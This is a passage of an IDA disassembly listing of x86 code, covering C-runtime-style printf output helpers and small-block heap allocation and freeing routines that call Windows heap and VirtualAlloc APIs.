push [ebp+arg_0]
push eax
lea eax, [ebp+var_38]
push eax
call sub_4133E3
add esp, 10h
mov eax, edi
dec edi
test eax, eax
jnz short loc_4132E5
jmp short loc_41332C
; ---------------------------------------------------------------------------
loc_413317: ; CODE XREF: sub_412C3C+698�j
; sub_412C3C+69E�j
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push [ebp+var_C]
push [ebp+var_8]
call sub_4133E3
add esp, 10h
loc_41332C: ; CODE XREF: sub_412C3C+6BC�j
; sub_412C3C+6D9�j
test byte ptr [ebp+var_4], 4
jz short loc_413344 ; default
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push esi
push 20h
call sub_4133B2
add esp, 10h
loc_413344: ; CODE XREF: sub_412C3C+68�j
; sub_412C3C+8B�j ...
mov edi, [ebp+arg_4] ; default
mov bl, [edi]
inc edi
test bl, bl
mov [ebp+arg_4], edi
jnz loc_412C68
loc_413355: ; CODE XREF: sub_412C3C+1F�j
; sub_412C3C+37�j
mov eax, [ebp+var_14]
pop edi
pop esi
pop ebx
leave
retn
sub_412C3C endp
; ---------------------------------------------------------------------------
off_41335D dd offset loc_412DDB ; DATA XREF: sub_412C3C+6E�r
dd offset loc_412CB1 ; jump table for switch statement
dd offset loc_412CCC
dd offset loc_412D18
dd offset loc_412D4F
dd offset loc_412D57
dd offset loc_412D8C
dd offset loc_412E1F
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41337D proc near ; CODE XREF: sub_412C3C+1BD�p
; sub_412C3C+1D6�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_4]
dec dword ptr [ecx+4]
js short loc_413396
mov edx, [ecx]
mov al, byte ptr [ebp+arg_0]
mov [edx], al
inc dword ptr [ecx]
movzx eax, al
jmp short loc_4133A1
; ---------------------------------------------------------------------------
loc_413396: ; CODE XREF: sub_41337D+9�j
push ecx
push [ebp+arg_0]
call sub_412B27
pop ecx
pop ecx
loc_4133A1: ; CODE XREF: sub_41337D+17�j
cmp eax, 0FFFFFFFFh
mov eax, [ebp+arg_8]
jnz short loc_4133AE
or dword ptr [eax], 0FFFFFFFFh
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4133AE: ; CODE XREF: sub_41337D+2A�j
inc dword ptr [eax]
pop ebp
retn
sub_41337D endp
; =============== S U B R O U T I N E =======================================
sub_4133B2 proc near ; CODE XREF: sub_412C3C+65A�p
; sub_412C3C+68C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push esi
push edi
mov edi, [esp+8+arg_4]
mov eax, edi
dec edi
test eax, eax
jle short loc_4133E0
mov esi, [esp+8+arg_C]
loc_4133C3: ; CODE XREF: sub_4133B2+2C�j
push esi
push [esp+0Ch+arg_8]
push [esp+10h+arg_0]
call sub_41337D
add esp, 0Ch
cmp dword ptr [esi], 0FFFFFFFFh
jz short loc_4133E0
mov eax, edi
dec edi
test eax, eax
jg short loc_4133C3
loc_4133E0: ; CODE XREF: sub_4133B2+B�j
; sub_4133B2+25�j
pop edi
pop esi
retn
sub_4133B2 endp
; =============== S U B R O U T I N E =======================================
sub_4133E3 proc near ; CODE XREF: sub_412C3C+670�p
; sub_412C3C+6CA�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
mov ebx, [esp+4+arg_4]
mov eax, ebx
dec ebx
push esi
push edi
test eax, eax
jle short loc_413417
mov edi, [esp+0Ch+arg_C]
mov esi, [esp+0Ch+arg_0]
loc_4133F9: ; CODE XREF: sub_4133E3+32�j
movsx eax, byte ptr [esi]
push edi
inc esi
push [esp+10h+arg_8]
push eax
call sub_41337D
add esp, 0Ch
cmp dword ptr [edi], 0FFFFFFFFh
jz short loc_413417
mov eax, ebx
dec ebx
test eax, eax
jg short loc_4133F9
loc_413417: ; CODE XREF: sub_4133E3+C�j
; sub_4133E3+2B�j
pop edi
pop esi
pop ebx
retn
sub_4133E3 endp
; =============== S U B R O U T I N E =======================================
sub_41341B proc near ; CODE XREF: sub_412C3C+E5�p
; sub_412C3C+124�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add dword ptr [eax], 4
mov eax, [eax]
mov eax, [eax-4]
retn
sub_41341B endp
; =============== S U B R O U T I N E =======================================
sub_413428 proc near ; CODE XREF: sub_412C3C+4FA�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add dword ptr [eax], 8
mov ecx, [eax]
mov eax, [ecx-8]
mov edx, [ecx-4]
retn
sub_413428 endp
; =============== S U B R O U T I N E =======================================
sub_413438 proc near ; CODE XREF: sub_412C3C+2C7�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add dword ptr [eax], 4
mov eax, [eax]
mov ax, [eax-4]
retn
sub_413438 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413446 proc near ; CODE XREF: sub_4109F4+17�p
; sub_4109F4+58�p ...
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
lea ecx, [eax+1]
cmp ecx, 100h
ja short loc_413464
mov ecx, ds:dword_42E190
movzx eax, word ptr [ecx+eax*2]
jmp short loc_4134B6
; ---------------------------------------------------------------------------
loc_413464: ; CODE XREF: sub_413446+10�j
mov ecx, eax
push esi
mov esi, ds:dword_42E190
sar ecx, 8
movzx edx, cl
test byte ptr [esi+edx*2+1], 80h
pop esi
jz short loc_413489
and [ebp+var_2], 0
mov [ebp+var_4], cl
mov [ebp+var_3], al
push 2
jmp short loc_413492
; ---------------------------------------------------------------------------
loc_413489: ; CODE XREF: sub_413446+33�j
and [ebp+var_3], 0
mov [ebp+var_4], al
push 1
loc_413492: ; CODE XREF: sub_413446+41�j
pop eax
lea ecx, [ebp+arg_0+2]
push 1
push 0
push 0
push ecx
push eax
lea eax, [ebp+var_4]
push eax
push 1
call loc_4180E4
add esp, 1Ch
test eax, eax
jnz short loc_4134B2
leave
retn
; ---------------------------------------------------------------------------
loc_4134B2: ; CODE XREF: sub_413446+68�j
movzx eax, word ptr [ebp+arg_0+2]
loc_4134B6: ; CODE XREF: sub_413446+1C�j
and eax, [ebp+arg_4]
leave
retn
sub_413446 endp
; =============== S U B R O U T I N E =======================================
sub_4134BB proc near ; CODE XREF: sub_410C21+1F�p
; sub_41237F+106�p ...
arg_0 = dword ptr 4
mov eax, ds:dword_45F8A0
test eax, eax
jz short loc_4134D3
push [esp+arg_0]
call eax
test eax, eax
pop ecx
jz short loc_4134D3
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_4134D3: ; CODE XREF: sub_4134BB+7�j
; sub_4134BB+12�j
xor eax, eax
retn
sub_4134BB endp
; =============== S U B R O U T I N E =======================================
sub_4134D6 proc near ; CODE XREF: seg000:00412A42�p
arg_0 = dword ptr 4
xor eax, eax
push 0
cmp [esp+4+arg_0], eax
push 1000h
setz al
push eax
call ds:dword_41C15C ; HeapCreate
test eax, eax
mov ds:dword_460EA0, eax
jz short loc_41350B
call sub_413512
test eax, eax
jnz short loc_41350E
push ds:dword_460EA0
call ds:dword_41C158 ; HeapDestroy
loc_41350B: ; CODE XREF: sub_4134D6+1E�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41350E: ; CODE XREF: sub_4134D6+27�j
push 1
pop eax
retn
sub_4134D6 endp
; =============== S U B R O U T I N E =======================================
sub_413512 proc near ; CODE XREF: sub_4134D6+20�p
push 140h
push 0
push ds:dword_460EA0
call ds:dword_41C134 ; RtlAllocateHeap
test eax, eax
mov ds:dword_460E9C, eax
jnz short loc_41352F
retn
; ---------------------------------------------------------------------------
loc_41352F: ; CODE XREF: sub_413512+1A�j
and ds:dword_460E94, 0
and ds:dword_460E98, 0
push 1
mov ds:dword_460E90, eax
mov ds:dword_460E88, 10h
pop eax
retn
sub_413512 endp
; =============== S U B R O U T I N E =======================================
sub_413550 proc near ; CODE XREF: sub_410C83+A�p
; sub_41237F+3D�p ...
arg_0 = dword ptr 4
mov eax, ds:dword_460E98
lea ecx, [eax+eax*4]
mov eax, ds:dword_460E9C
lea ecx, [eax+ecx*4]
loc_413560: ; CODE XREF: sub_413550+26�j
cmp eax, ecx
jnb short loc_413578
mov edx, [esp+arg_0]
sub edx, [eax+0Ch]
cmp edx, 100000h
jb short locret_41357A
add eax, 14h
jmp short loc_413560
; ---------------------------------------------------------------------------
loc_413578: ; CODE XREF: sub_413550+12�j
xor eax, eax
locret_41357A: ; CODE XREF: sub_413550+21�j
retn
sub_413550 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41357B proc near ; CODE XREF: sub_410C83+16�p
; sub_41237F+89�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
mov edx, [ebp+arg_4]
mov ecx, [ebp+arg_0]
push ebx
push esi
mov eax, [ecx+10h]
mov esi, edx
sub esi, [ecx+0Ch]
mov ebx, [edx-4]
add edx, 0FFFFFFFCh
push edi
shr esi, 0Fh
mov ecx, esi
mov edi, [edx-4]
imul ecx, 204h
dec ebx
mov [ebp+var_4], edi
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ebx
mov [ebp+var_10], ecx
mov ecx, [ebx+edx]
test cl, 1
mov [ebp+var_8], ecx
jnz short loc_413641
sar ecx, 4
push 3Fh
dec ecx
pop edi
mov [ebp+arg_4], ecx
cmp ecx, edi
jbe short loc_4135D3
mov [ebp+arg_4], edi
loc_4135D3: ; CODE XREF: sub_41357B+53�j
mov ecx, [ebx+edx+4]
cmp ecx, [ebx+edx+8]
jnz short loc_413625
mov ecx, [ebp+arg_4]
cmp ecx, 20h
jnb short loc_413601
mov edi, 80000000h
shr edi, cl
lea ecx, [ecx+eax+4]
not edi
and [eax+esi*4+44h], edi
dec byte ptr [ecx]
jnz short loc_413625
mov ecx, [ebp+arg_0]
and [ecx], edi
jmp short loc_413625
; ---------------------------------------------------------------------------
loc_413601: ; CODE XREF: sub_41357B+68�j
add ecx, 0FFFFFFE0h
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_4]
lea ecx, [ecx+eax+4]
not edi
and [eax+esi*4+0C4h], edi
dec byte ptr [ecx]
jnz short loc_413625
mov ecx, [ebp+arg_0]
and [ecx+4], edi
loc_413625: ; CODE XREF: sub_41357B+60�j
; sub_41357B+7D�j ...
mov ecx, [ebx+edx+8]
mov edi, [ebx+edx+4]
mov [ecx+4], edi
mov ecx, [ebx+edx+4]
mov edi, [ebx+edx+8]
add ebx, [ebp+var_8]
mov [ecx+8], edi
mov [ebp+var_C], ebx
loc_413641: ; CODE XREF: sub_41357B+45�j
mov edi, ebx
sar edi, 4
dec edi
cmp edi, 3Fh
jbe short loc_41364F
push 3Fh
pop edi
loc_41364F: ; CODE XREF: sub_41357B+CF�j
mov ecx, [ebp+var_4]
and ecx, 1
mov [ebp+var_14], ecx
jnz loc_4136FE
sub edx, [ebp+var_4]
mov ecx, [ebp+var_4]
sar ecx, 4
push 3Fh
mov [ebp+var_8], edx
dec ecx
pop edx
cmp ecx, edx
mov [ebp+arg_4], ecx
jbe short loc_41367A
mov [ebp+arg_4], edx
mov ecx, edx
loc_41367A: ; CODE XREF: sub_41357B+F8�j
add ebx, [ebp+var_4]
mov edi, ebx
mov [ebp+var_C], ebx
sar edi, 4
dec edi
cmp edi, edx
jbe short loc_41368C
mov edi, edx
loc_41368C: ; CODE XREF: sub_41357B+10D�j
cmp ecx, edi
jz short loc_4136FB
mov ecx, [ebp+var_8]
mov edx, [ecx+4]
cmp edx, [ecx+8]
jnz short loc_4136E3
mov ecx, [ebp+arg_4]
cmp ecx, 20h
jnb short loc_4136BF
mov edx, 80000000h
shr edx, cl
lea ecx, [ecx+eax+4]
not edx
and [eax+esi*4+44h], edx
dec byte ptr [ecx]
jnz short loc_4136E3
mov ecx, [ebp+arg_0]
and [ecx], edx
jmp short loc_4136E3
; ---------------------------------------------------------------------------
loc_4136BF: ; CODE XREF: sub_41357B+126�j
add ecx, 0FFFFFFE0h
mov edx, 80000000h
shr edx, cl
mov ecx, [ebp+arg_4]
lea ecx, [ecx+eax+4]
not edx
and [eax+esi*4+0C4h], edx
dec byte ptr [ecx]
jnz short loc_4136E3
mov ecx, [ebp+arg_0]
and [ecx+4], edx
loc_4136E3: ; CODE XREF: sub_41357B+11E�j
; sub_41357B+13B�j ...
mov ecx, [ebp+var_8]
mov edx, [ecx+8]
mov ecx, [ecx+4]
mov [edx+4], ecx
mov ecx, [ebp+var_8]
mov edx, [ecx+4]
mov ecx, [ecx+8]
mov [edx+8], ecx
loc_4136FB: ; CODE XREF: sub_41357B+113�j
mov edx, [ebp+var_8]
loc_4136FE: ; CODE XREF: sub_41357B+DD�j
cmp [ebp+var_14], 0
jnz short loc_41370D
cmp [ebp+arg_4], edi
jz loc_413796
loc_41370D: ; CODE XREF: sub_41357B+187�j
mov ecx, [ebp+var_10]
lea ecx, [ecx+edi*8]
mov ecx, [ecx+4]
mov [edx+4], ecx
mov ecx, [ebp+var_10]
lea ecx, [ecx+edi*8]
mov [edx+8], ecx
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_413796
mov cl, [edi+eax+4]
cmp edi, 20h
mov byte ptr [ebp+arg_4+3], cl
inc cl
mov [edi+eax+4], cl
jnb short loc_41376A
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_413759
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_413759: ; CODE XREF: sub_41357B+1CE�j
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
lea eax, [eax+esi*4+44h]
or [eax], ebx
jmp short loc_413793
; ---------------------------------------------------------------------------
loc_41376A: ; CODE XREF: sub_41357B+1C8�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_413780
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_413780: ; CODE XREF: sub_41357B+1F3�j
lea ecx, [edi-20h]
mov edi, 80000000h
shr edi, cl
lea eax, [eax+esi*4+0C4h]
or [eax], edi
loc_413793: ; CODE XREF: sub_41357B+1ED�j
mov ebx, [ebp+var_C]
loc_413796: ; CODE XREF: sub_41357B+18C�j
; sub_41357B+1B6�j
mov eax, [ebp+var_10]
mov [edx], ebx
mov [ebx+edx-4], ebx
dec dword ptr [eax]
jnz loc_4138A1
mov eax, ds:dword_460E94
test eax, eax
jz loc_413893
mov ecx, ds:dword_460E8C
mov edi, ds:dword_41C160
shl ecx, 0Fh
add ecx, [eax+0Ch]
mov ebx, 8000h
push 4000h
push ebx
push ecx
call edi ; VirtualFree
mov ecx, ds:dword_460E8C
mov eax, ds:dword_460E94
mov edx, 80000000h
shr edx, cl
or [eax+8], edx
mov eax, ds:dword_460E94
mov ecx, ds:dword_460E8C
mov eax, [eax+10h]
and dword ptr [eax+ecx*4+0C4h], 0
mov eax, ds:dword_460E94
mov eax, [eax+10h]
dec byte ptr [eax+43h]
mov eax, ds:dword_460E94
mov ecx, [eax+10h]
cmp byte ptr [ecx+43h], 0
jnz short loc_413821
and dword ptr [eax+4], 0FFFFFFFEh
mov eax, ds:dword_460E94
loc_413821: ; CODE XREF: sub_41357B+29B�j
cmp dword ptr [eax+8], 0FFFFFFFFh
jnz short loc_413893
push ebx
push 0
push dword ptr [eax+0Ch]
call edi ; VirtualFree
mov eax, ds:dword_460E94
push dword ptr [eax+10h]
push 0
push ds:dword_460EA0
call ds:dword_41C138 ; RtlFreeHeap
mov eax, ds:dword_460E98
mov edx, ds:dword_460E9C
lea eax, [eax+eax*4]
shl eax, 2
mov ecx, eax
mov eax, ds:dword_460E94
sub ecx, eax
lea ecx, [ecx+edx-14h]
push ecx
lea ecx, [eax+14h]
push ecx
push eax
call sub_4112D0
mov eax, [ebp+arg_0]
add esp, 0Ch
dec ds:dword_460E98
cmp eax, ds:dword_460E94
jbe short loc_413885
sub eax, 14h
loc_413885: ; CODE XREF: sub_41357B+305�j
mov ecx, ds:dword_460E9C
mov ds:dword_460E90, ecx
jmp short loc_413896
; ---------------------------------------------------------------------------
loc_413893: ; CODE XREF: sub_41357B+233�j
; sub_41357B+2AA�j
mov eax, [ebp+arg_0]
loc_413896: ; CODE XREF: sub_41357B+316�j
mov ds:dword_460E94, eax
mov ds:dword_460E8C, esi
loc_4138A1: ; CODE XREF: sub_41357B+226�j
pop edi
pop esi
pop ebx
leave
retn
sub_41357B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4138A6 proc near ; CODE XREF: sub_410C4D+E�p
; sub_41237F+69�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov eax, ds:dword_460E98
mov edx, ds:dword_460E9C
push ebx
push esi
lea eax, [eax+eax*4]
push edi
lea edi, [edx+eax*4]
mov eax, [ebp+arg_0]
mov [ebp+var_4], edi
lea ecx, [eax+17h]
and ecx, 0FFFFFFF0h
mov [ebp+var_10], ecx
sar ecx, 4
dec ecx
cmp ecx, 20h
jge short loc_4138E6
or esi, 0FFFFFFFFh
shr esi, cl
or [ebp+var_8], 0FFFFFFFFh
mov [ebp+var_C], esi
jmp short loc_4138F6
; ---------------------------------------------------------------------------
loc_4138E6: ; CODE XREF: sub_4138A6+30�j
add ecx, 0FFFFFFE0h
or eax, 0FFFFFFFFh
xor esi, esi
shr eax, cl
mov [ebp+var_C], esi
mov [ebp+var_8], eax
loc_4138F6: ; CODE XREF: sub_4138A6+3E�j
mov eax, ds:dword_460E90
mov ebx, eax
cmp ebx, edi
mov [ebp+arg_0], ebx
jnb short loc_41391D
loc_413904: ; CODE XREF: sub_4138A6+75�j
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_41391D
add ebx, 14h
cmp ebx, [ebp+var_4]
mov [ebp+arg_0], ebx
jb short loc_413904
loc_41391D: ; CODE XREF: sub_4138A6+5C�j
; sub_4138A6+6A�j
cmp ebx, [ebp+var_4]
jnz short loc_41399B
mov ebx, edx
loc_413924: ; CODE XREF: sub_4138A6+96�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jnb short loc_413940
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_41393E
add ebx, 14h
jmp short loc_413924
; ---------------------------------------------------------------------------
loc_41393E: ; CODE XREF: sub_4138A6+91�j
cmp ebx, eax
loc_413940: ; CODE XREF: sub_4138A6+83�j
jnz short loc_41399B
loc_413942: ; CODE XREF: sub_4138A6+AD�j
cmp ebx, [ebp+var_4]
jnb short loc_413958
cmp dword ptr [ebx+8], 0
jnz short loc_413955
add ebx, 14h
mov [ebp+arg_0], ebx
jmp short loc_413942
; ---------------------------------------------------------------------------
loc_413955: ; CODE XREF: sub_4138A6+A5�j
cmp ebx, [ebp+var_4]
loc_413958: ; CODE XREF: sub_4138A6+9F�j
jnz short loc_413980
mov ebx, edx
loc_41395C: ; CODE XREF: sub_4138A6+C6�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jnb short loc_413970
cmp dword ptr [ebx+8], 0
jnz short loc_41396E
add ebx, 14h
jmp short loc_41395C
; ---------------------------------------------------------------------------
loc_41396E: ; CODE XREF: sub_4138A6+C1�j
cmp ebx, eax
loc_413970: ; CODE XREF: sub_4138A6+BB�j
jnz short loc_413980
call sub_413BAF
mov ebx, eax
test ebx, ebx
mov [ebp+arg_0], ebx
jz short loc_413994
loc_413980: ; CODE XREF: sub_4138A6:loc_413958�j
; sub_4138A6:loc_413970�j
push ebx
call sub_413C60
pop ecx
mov ecx, [ebx+10h]
mov [ecx], eax
mov eax, [ebx+10h]
cmp dword ptr [eax], 0FFFFFFFFh
jnz short loc_41399B
loc_413994: ; CODE XREF: sub_4138A6+D8�j
xor eax, eax
jmp loc_413BAA
; ---------------------------------------------------------------------------
loc_41399B: ; CODE XREF: sub_4138A6+7A�j
; sub_4138A6:loc_413940�j ...
mov ds:dword_460E90, ebx
mov eax, [ebx+10h]
mov edx, [eax]
cmp edx, 0FFFFFFFFh
mov [ebp+var_4], edx
jz short loc_4139C2
mov ecx, [eax+edx*4+0C4h]
mov edi, [eax+edx*4+44h]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_4139F9
loc_4139C2: ; CODE XREF: sub_4138A6+106�j
mov edx, [eax+0C4h]
mov esi, [eax+44h]
and edx, [ebp+var_8]
and esi, [ebp+var_C]
and [ebp+var_4], 0
lea ecx, [eax+44h]
or edx, esi
mov esi, [ebp+var_C]
jnz short loc_4139F6
loc_4139DF: ; CODE XREF: sub_4138A6+14E�j
mov edx, [ecx+84h]
inc [ebp+var_4]
and edx, [ebp+var_8]
add ecx, 4
mov edi, esi
and edi, [ecx]
or edx, edi
jz short loc_4139DF
loc_4139F6: ; CODE XREF: sub_4138A6+137�j
mov edx, [ebp+var_4]
loc_4139F9: ; CODE XREF: sub_4138A6+11A�j
mov ecx, edx
xor edi, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [eax+edx*4+44h]
and ecx, esi
jnz short loc_413A22
mov ecx, [eax+edx*4+0C4h]
push 20h
and ecx, [ebp+var_8]
pop edi
loc_413A22: ; CODE XREF: sub_4138A6+16D�j
; sub_4138A6+183�j
test ecx, ecx
jl short loc_413A2B
shl ecx, 1
inc edi
jmp short loc_413A22
; ---------------------------------------------------------------------------
loc_413A2B: ; CODE XREF: sub_4138A6+17E�j
mov ecx, [ebp+var_C]
mov edx, [ecx+edi*8+4]
mov ecx, [edx]
sub ecx, [ebp+var_10]
mov esi, ecx
mov [ebp+var_8], ecx
sar esi, 4
dec esi
cmp esi, 3Fh
jle short loc_413A48
push 3Fh
pop esi
loc_413A48: ; CODE XREF: sub_4138A6+19D�j
cmp esi, edi
jz loc_413B5D
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_413AB9
cmp edi, 20h
jge short loc_413A88
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
not ebx
mov [ebp+var_14], ebx
and ebx, [eax+ecx*4+44h]
mov [eax+ecx*4+44h], ebx
dec byte ptr [edi]
jnz short loc_413AB6
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx], ecx
jmp short loc_413AB9
; ---------------------------------------------------------------------------
loc_413A88: ; CODE XREF: sub_4138A6+1B5�j
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
lea ecx, [eax+ecx*4+0C4h]
not ebx
and [ecx], ebx
dec byte ptr [edi]
mov [ebp+var_14], ebx
jnz short loc_413AB6
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx+4], ecx
jmp short loc_413AB9
; ---------------------------------------------------------------------------
loc_413AB6: ; CODE XREF: sub_4138A6+1D6�j
; sub_4138A6+203�j
mov ebx, [ebp+arg_0]
loc_413AB9: ; CODE XREF: sub_4138A6+1B0�j
; sub_4138A6+1E0�j ...
mov ecx, [edx+8]
mov edi, [edx+4]
cmp [ebp+var_8], 0
mov [ecx+4], edi
mov ecx, [edx+4]
mov edi, [edx+8]
mov [ecx+8], edi
jz loc_413B69
mov ecx, [ebp+var_C]
mov edi, [ecx+esi*8+4]
lea ecx, [ecx+esi*8]
mov [edx+4], edi
mov [edx+8], ecx
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_413B5A
mov cl, [esi+eax+4]
cmp esi, 20h
mov byte ptr [ebp+arg_0+3], cl
jge short loc_413B2B
inc cl
cmp byte ptr [ebp+arg_0+3], 0
mov [esi+eax+4], cl
jnz short loc_413B19
mov edi, 80000000h
mov ecx, esi
shr edi, cl
or [ebx], edi
loc_413B19: ; CODE XREF: sub_4138A6+266�j
mov edi, 80000000h
mov ecx, esi
shr edi, cl
mov ecx, [ebp+var_4]
or [eax+ecx*4+44h], edi
jmp short loc_413B5A
; ---------------------------------------------------------------------------
loc_413B2B: ; CODE XREF: sub_4138A6+25A�j
inc cl
cmp byte ptr [ebp+arg_0+3], 0
mov [esi+eax+4], cl
jnz short loc_413B44
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
or [ebx+4], edi
loc_413B44: ; CODE XREF: sub_4138A6+28F�j
mov ecx, [ebp+var_4]
lea edi, [eax+ecx*4+0C4h]
lea ecx, [esi-20h]
mov esi, 80000000h
shr esi, cl
or [edi], esi
loc_413B5A: ; CODE XREF: sub_4138A6+24E�j
; sub_4138A6+283�j
mov ecx, [ebp+var_8]
loc_413B5D: ; CODE XREF: sub_4138A6+1A4�j
test ecx, ecx
jz short loc_413B6C
mov [edx], ecx
mov [ecx+edx-4], ecx
jmp short loc_413B6C
; ---------------------------------------------------------------------------
loc_413B69: ; CODE XREF: sub_4138A6+229�j
mov ecx, [ebp+var_8]
loc_413B6C: ; CODE XREF: sub_4138A6+2B9�j
; sub_4138A6+2C1�j
mov esi, [ebp+var_10]
add edx, ecx
lea ecx, [esi+1]
mov [edx], ecx
mov [edx+esi-4], ecx
mov esi, [ebp+var_C]
mov ecx, [esi]
test ecx, ecx
lea edi, [ecx+1]
mov [esi], edi
jnz short loc_413BA2
cmp ebx, ds:dword_460E94
jnz short loc_413BA2
mov ecx, [ebp+var_4]
cmp ecx, ds:dword_460E8C
jnz short loc_413BA2
and ds:dword_460E94, 0
loc_413BA2: ; CODE XREF: sub_4138A6+2E0�j
; sub_4138A6+2E8�j ...
mov ecx, [ebp+var_4]
mov [eax], ecx
lea eax, [edx+4]
loc_413BAA: ; CODE XREF: sub_4138A6+F0�j
pop edi
pop esi
pop ebx
leave
retn
sub_4138A6 endp
; =============== S U B R O U T I N E =======================================
sub_413BAF proc near ; CODE XREF: sub_4138A6+CC�p
mov eax, ds:dword_460E98
mov ecx, ds:dword_460E88
push esi
push edi
xor edi, edi
cmp eax, ecx
jnz short loc_413BF2
lea eax, [ecx+ecx*4+50h]
shl eax, 2
push eax
push ds:dword_460E9C
push edi
push ds:dword_460EA0
call ds:dword_41C148 ; RtlReAllocateHeap
cmp eax, edi
jz short loc_413C42
add ds:dword_460E88, 10h
mov ds:dword_460E9C, eax
mov eax, ds:dword_460E98
loc_413BF2: ; CODE XREF: sub_413BAF+11�j
mov ecx, ds:dword_460E9C
push 41C4h
push 8
lea eax, [eax+eax*4]
push ds:dword_460EA0
lea esi, [ecx+eax*4]
call ds:dword_41C134 ; RtlAllocateHeap
cmp eax, edi
mov [esi+10h], eax
jz short loc_413C42
push 4
push 2000h
push 100000h
push edi
call ds:dword_41C164 ; VirtualAlloc
cmp eax, edi
mov [esi+0Ch], eax
jnz short loc_413C46
push dword ptr [esi+10h]
push edi
push ds:dword_460EA0
call ds:dword_41C138 ; RtlFreeHeap
loc_413C42: ; CODE XREF: sub_413BAF+30�j
; sub_413BAF+67�j
xor eax, eax
jmp short loc_413C5D
; ---------------------------------------------------------------------------
loc_413C46: ; CODE XREF: sub_413BAF+81�j
or dword ptr [esi+8], 0FFFFFFFFh
mov [esi], edi
mov [esi+4], edi
inc ds:dword_460E98
mov eax, [esi+10h]
or dword ptr [eax], 0FFFFFFFFh
mov eax, esi
loc_413C5D: ; CODE XREF: sub_413BAF+95�j
pop edi
pop esi
retn
sub_413BAF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413C60 proc near ; CODE XREF: sub_4138A6+DB�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, [ecx+10h]
mov eax, [ecx+8]
xor ebx, ebx
loc_413C72: ; CODE XREF: sub_413C60+19�j
test eax, eax
jl short loc_413C7B
shl eax, 1
inc ebx
jmp short loc_413C72
; ---------------------------------------------------------------------------
loc_413C7B: ; CODE XREF: sub_413C60+14�j
mov eax, ebx
push 3Fh
imul eax, 204h
pop edx
lea eax, [eax+esi+144h]
mov [ebp+var_4], eax
loc_413C90: ; CODE XREF: sub_413C60+3A�j
mov [eax+8], eax
mov [eax+4], eax
add eax, 8
dec edx
jnz short loc_413C90
mov edi, ebx
push 4
shl edi, 0Fh
add edi, [ecx+0Ch]
push 1000h
push 8000h
push edi
call ds:dword_41C164 ; VirtualAlloc
test eax, eax
jnz short loc_413CC3
or eax, 0FFFFFFFFh
jmp loc_413D56
; ---------------------------------------------------------------------------
loc_413CC3: ; CODE XREF: sub_413C60+59�j
lea edx, [edi+7000h]
cmp edi, edx
ja short loc_413D09
lea eax, [edi+10h]
loc_413CD0: ; CODE XREF: sub_413C60+A7�j
or dword ptr [eax-8], 0FFFFFFFFh
or dword ptr [eax+0FECh], 0FFFFFFFFh
lea ecx, [eax+0FFCh]
mov dword ptr [eax-4], 0FF0h
mov [eax], ecx
lea ecx, [eax-1004h]
mov [eax+4], ecx
mov dword ptr [eax+0FE8h], 0FF0h
